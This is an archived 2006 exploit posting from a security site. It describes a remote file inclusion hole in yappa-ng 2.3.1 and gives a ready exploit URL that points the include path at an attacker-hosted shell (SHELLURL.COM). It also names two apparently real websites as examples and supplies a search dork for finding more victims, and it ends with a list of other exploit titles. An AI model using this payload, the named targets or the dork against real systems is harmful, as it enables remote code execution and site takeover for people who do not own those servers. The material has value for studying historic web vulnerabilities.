exploits , vulnerabilities , articles , yappa-ng <= 2.3.1 (admin_modules) Remote File Include Vulnerability

2006-09-04

yappa-ng <= 2.3.1 (admin_modules) Remote File Include Vulnerability

Rated as : Moderate Risk

#==============================================================================================
#yappa-ng <= v2.3.1 (admin_modules) Remote File Inclusion Exploit
#===============================================================================================
#                                                                        

#Critical Level : Dangerous                                              

#                                                                        

#Venedor site : http://www.zirkon.at/zirkon/scripts/yappa-ng         
#                                                                        

#Version : v2.3.1 & v2.3.0                                               
#                                                           
#================================================================================================
#Bug in : admin_modules/admin_module_deldir.inc.php
#
#Vlu Code :
#--------------------------------
#     include_once($config['path_src_include'] .
"common.inc.php");
#   
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://SHELLURL.COM?
#
#Example :
#       http://gl-bild.de
#       http://www.team.elsat.net.pl/pliki/yappa2/
#    
#Dork : "Powered by yappa-ng 2.3.1" & "Powered by yappa-ng
2.3.1"
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam
(coder-cruze-wolf) | cyper-worrior
==================================================================================================
securitydot.net - 2006-09-04

Exploits - newest 10 RSS | More

2007-06-15 57219 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34156 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42362 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29306 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19746 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16685 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19381 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16566 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33582 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17209 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit